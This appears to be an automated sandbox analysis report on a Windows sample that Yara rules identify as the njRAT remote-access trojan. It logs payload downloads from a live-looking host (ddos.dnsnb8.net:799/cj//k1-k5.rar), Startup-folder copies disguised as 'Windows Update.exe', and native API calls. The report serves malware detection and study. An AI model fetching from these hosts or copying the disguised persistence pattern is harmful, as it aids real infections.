Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: ddos.dnsnb8.net

Source: RRqyIX.exe, 00000001.00000003.2148360236.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmp, RRqyIX.exe, 0000000F.00000003.2336903520.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527841378.0000000000A33000.00000002.00000001.01000000.00000004.sdmp, RRqyIX.exe, 00000016.00000002.2611797178.0000000000513000.00000002.00000001.01000000.00000004.sdmp, RRqyIX.exe, 00000016.00000003.2607592735.00000000008E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000003.2358915133.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar#O
Source: RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar1
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarH
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarM
Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarPO
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar_
Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarc
Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rard
Source: RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rareM
Source: RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarn
Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarzO
Source: RRqyIX.exe, 00000001.00000002.2244767719.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000002.2244767719.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000002.2244767719.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000002.2245675608.0000000000C2A000.00000004.00000010.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: RRqyIX.exe, 00000001.00000002.2244767719.00000000006D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar5
Source: RRqyIX.exe, 00000001.00000002.2244767719.00000000006A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar86)
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarE
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarM
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarR
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarZ
Source: RRqyIX.exe, 00000001.00000002.2244767719.000000000063E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarp6
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rara
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarx
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar$
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
Source: LisectAVT_2403002B_366.exe, Explower.exe6.4.dr, system.exe.4.dr, Notepad.exe.4.dr, Explower.exe0.4.dr, Explower.exe8.4.dr, Explower.exe.4.dr, Explower.exe2.4.dr, Explower.exe3.4.dr, Explower.exe4.4.dr, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr, server.exe.0.dr, Explower.exe7.4.dr, Microsoft Corporation.exe.4.dr, Explower.exe5.4.dr, Explower.exe1.4.dr	String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: LisectAVT_2403002B_366.exe, Explower.exe6.4.dr, system.exe.4.dr, Notepad.exe.4.dr, Explower.exe0.4.dr, Explower.exe8.4.dr, Explower.exe.4.dr, Explower.exe2.4.dr, Explower.exe3.4.dr, Explower.exe4.4.dr, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr, server.exe.0.dr, Explower.exe7.4.dr, Microsoft Corporation.exe.4.dr, Explower.exe5.4.dr, Explower.exe1.4.dr	String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr
Source: LisectAVT_2403002B_366.exe, Explower.exe6.4.dr, system.exe.4.dr, Notepad.exe.4.dr, Explower.exe0.4.dr, Explower.exe8.4.dr, Explower.exe.4.dr, Explower.exe2.4.dr, Explower.exe3.4.dr, Explower.exe4.4.dr, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr, server.exe.0.dr, Explower.exe7.4.dr, Microsoft Corporation.exe.4.dr, Explower.exe5.4.dr, Explower.exe1.4.dr	String found in binary or memory: http://pki-ocsp.symauth.com0
Source: Amcache.hve.1.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.comDeepak
Source: Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A4B000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.enigmaprotector.com/
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp, server.exe, 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmp, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe, 0000000E.00000002.2357048192.0000000000ACB000.00000040.00000001.01000000.0000000B.sdmp, Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A4B000.00000040.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.enigmaprotector.com/openU
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: RRqyIX.exe, 00000001.00000002.2244767719.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Window created: window name: CLIPBRDWNDCLASS

Source: SciTE.exe.1.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_2cc260de-a

E-Banking Fraud

Yara detected Njrat

Source: Yara match	File source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4628547568.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LisectAVT_2403002B_366.exe PID: 6620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server.exe PID: 6864, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe PID: 4068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Microsoft Corporation.exe PID: 1924, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group

PE file contains section with special chars

Source: MyProg.exe.1.dr

Static PE information: section name: Y|uR

PE file has a writeable .text section

Source: RRqyIX.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

PE file has nameless sections

Source: LisectAVT_2403002B_366.exe	Static PE information: section name:
Source: LisectAVT_2403002B_366.exe	Static PE information: section name:
Source: LisectAVT_2403002B_366.exe	Static PE information: section name:
Source: server.exe.0.dr	Static PE information: section name:
Source: server.exe.0.dr	Static PE information: section name:
Source: server.exe.0.dr	Static PE information: section name:
Source: Explower.exe.4.dr	Static PE information: section name:
Source: Explower.exe.4.dr	Static PE information: section name:
Source: Explower.exe.4.dr	Static PE information: section name:
Source: Microsoft Corporation.exe.4.dr	Static PE information: section name:
Source: Microsoft Corporation.exe.4.dr	Static PE information: section name:
Source: Microsoft Corporation.exe.4.dr	Static PE information: section name:
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr	Static PE information: section name:
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr	Static PE information: section name:
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr	Static PE information: section name:
Source: Explower.exe0.4.dr	Static PE information: section name:
Source: Explower.exe0.4.dr	Static PE information: section name:
Source: Explower.exe0.4.dr	Static PE information: section name:
Source: Explower.exe1.4.dr	Static PE information: section name:
Source: Explower.exe1.4.dr	Static PE information: section name:
Source: Explower.exe1.4.dr	Static PE information: section name:
Source: Explower.exe2.4.dr	Static PE information: section name:
Source: Explower.exe2.4.dr	Static PE information: section name:
Source: Explower.exe2.4.dr	Static PE information: section name:
Source: Explower.exe3.4.dr	Static PE information: section name:
Source: Explower.exe3.4.dr	Static PE information: section name:
Source: Explower.exe3.4.dr	Static PE information: section name:
Source: Explower.exe4.4.dr	Static PE information: section name:
Source: Explower.exe4.4.dr	Static PE information: section name:
Source: Explower.exe4.4.dr	Static PE information: section name:
Source: Explower.exe5.4.dr	Static PE information: section name:
Source: Explower.exe5.4.dr	Static PE information: section name:
Source: Explower.exe5.4.dr	Static PE information: section name:
Source: Explower.exe6.4.dr	Static PE information: section name:
Source: Explower.exe6.4.dr	Static PE information: section name:
Source: Explower.exe6.4.dr	Static PE information: section name:
Source: Explower.exe7.4.dr	Static PE information: section name:
Source: Explower.exe7.4.dr	Static PE information: section name:
Source: Explower.exe7.4.dr	Static PE information: section name:
Source: Explower.exe8.4.dr	Static PE information: section name:
Source: Explower.exe8.4.dr	Static PE information: section name:
Source: Explower.exe8.4.dr	Static PE information: section name:
Source: system.exe.4.dr	Static PE information: section name:
Source: system.exe.4.dr	Static PE information: section name:
Source: system.exe.4.dr	Static PE information: section name:
Source: Notepad.exe.4.dr	Static PE information: section name:
Source: Notepad.exe.4.dr	Static PE information: section name:
Source: Notepad.exe.4.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\server.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A199DC NtReadFile,	4_2_00A199DC
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A1996A NtClose,	4_2_00A1996A
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19974 NtSetInformationFile,	4_2_00A19974
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19A34 NtCreateFile,	4_2_00A19A34
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19B14 NtProtectVirtualMemory,	4_2_00A19B14
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A190A2 NtQuerySecurityObject,	4_2_00A190A2
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19098 NtSetSecurityObject,	4_2_00A19098
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A190D8 NtNotifyChangeDirectoryFile,	4_2_00A190D8
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19024 NtOpenKeyEx,	4_2_00A19024
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19050 NtSetVolumeInformationFile,	4_2_00A19050
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A191A3 NtFlushBuffersFile,	4_2_00A191A3
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A191BF NtExtendSection,	4_2_00A191BF
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A191C8 NtAccessCheck,	4_2_00A191C8
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19130 NtFsControlFile,	4_2_00A19130
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A192AC NtQueryValueKey,	4_2_00A192AC
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A192EC NtCreateKey,	4_2_00A192EC
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A1922C NtOpenKey,	4_2_00A1922C
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19236 NtEnumerateValueKey,	4_2_00A19236
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19278 NtQueryKey,	4_2_00A19278
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A193FE NtFlushKey,	4_2_00A193FE
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A193C6 NtDeleteKey,	4_2_00A193C6
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A193CE NtDeleteValueKey,	4_2_00A193CE
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19334 NtEnumerateKey,	4_2_00A19334
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19374 NtSetValueKey,	4_2_00A19374
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A194A4 NtQueryMultipleValueKey,	4_2_00A194A4
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A194F8 NtReplaceKey,	4_2_00A194F8
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19438 NtLoadKey2,	4_2_00A19438
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19406 NtLoadKey,	4_2_00A19406
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19442 NtNotifyChangeKey,	4_2_00A19442
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A195A4 NtWriteFile,	4_2_00A195A4
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19586 NtTerminateProcess,	4_2_00A19586
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A195FC NtQueryObject,	4_2_00A195FC
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19522 NtSaveKey,	4_2_00A19522
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19502 NtRestoreKey,	4_2_00A19502
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A1957E NtUnloadKey,	4_2_00A1957E
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19540 NtSetInformationKey,	4_2_00A19540
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19698 NtQueryDirectoryFileEx,	4_2_00A19698
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19630 NtQueryDirectoryFile,	4_2_00A19630
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A197A6 NtDeleteFile,	4_2_00A197A6
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A197AE NtLockFile,	4_2_00A197AE
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A1970C NtOpenSection,	4_2_00A1970C
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19716 NtDuplicateObject,	4_2_00A19716
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19760 NtQueryVolumeInformationFile,	4_2_00A19760
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A198B0 NtMapViewOfSection,	4_2_00A198B0
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19810 NtUnlockFile,	4_2_00A19810
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19873 NtUnmapViewOfSection,	4_2_00A19873
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A1987C NtQuerySection,	4_2_00A1987C
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19857 NtQueryFullAttributesFile,	4_2_00A19857
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A199A8 NtQueryInformationFile,	4_2_00A199A8
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19910 NtCreateSection,	4_2_00A19910
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19958 NtClose,	4_2_00A19958
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19A9C NtOpenFile,	4_2_00A19A9C
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A19AEF NtQueryAttributesFile,	4_2_00A19AEF
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A18EA8 NtCreateThread,	4_2_00A18EA8
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A18FBC NtCreateUserProcess,	4_2_00A18FBC
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A18F0B NtResumeThread,	4_2_00A18F0B
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A18F14 NtCreateProcess,	4_2_00A18F14
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00A18F64 NtCreateProcessEx,	4_2_00A18F64
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00D9BEC6 NtQuerySystemInformation,	4_2_00D9BEC6
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_00D9BE8B NtQuerySystemInformation,	4_2_00D9BE8B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A299DC NtReadFile,	14_2_00A299DC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A2996A NtClose,	14_2_00A2996A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29974 NtSetInformationFile,	14_2_00A29974
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29A34 NtCreateFile,	14_2_00A29A34
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29B14 NtProtectVirtualMemory,	14_2_00A29B14
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A290A2 NtQuerySecurityObject,	14_2_00A290A2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A298B0 NtMapViewOfSection,	14_2_00A298B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29098 NtSetSecurityObject,	14_2_00A29098
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A290D8 NtNotifyChangeDirectoryFile,	14_2_00A290D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29024 NtOpenKeyEx,	14_2_00A29024
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29810 NtUnlockFile,	14_2_00A29810
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29873 NtUnmapViewOfSection,	14_2_00A29873
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A2987C NtQuerySection,	14_2_00A2987C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29050 NtSetVolumeInformationFile,	14_2_00A29050
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29857 NtQueryFullAttributesFile,	14_2_00A29857
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A291A3 NtFlushBuffersFile,	14_2_00A291A3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A299A8 NtQueryInformationFile,	14_2_00A299A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A291BF NtExtendSection,	14_2_00A291BF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A291C8 NtAccessCheck,	14_2_00A291C8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29130 NtFsControlFile,	14_2_00A29130
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_00A29910 NtCreateSection,	14_2_00A29910
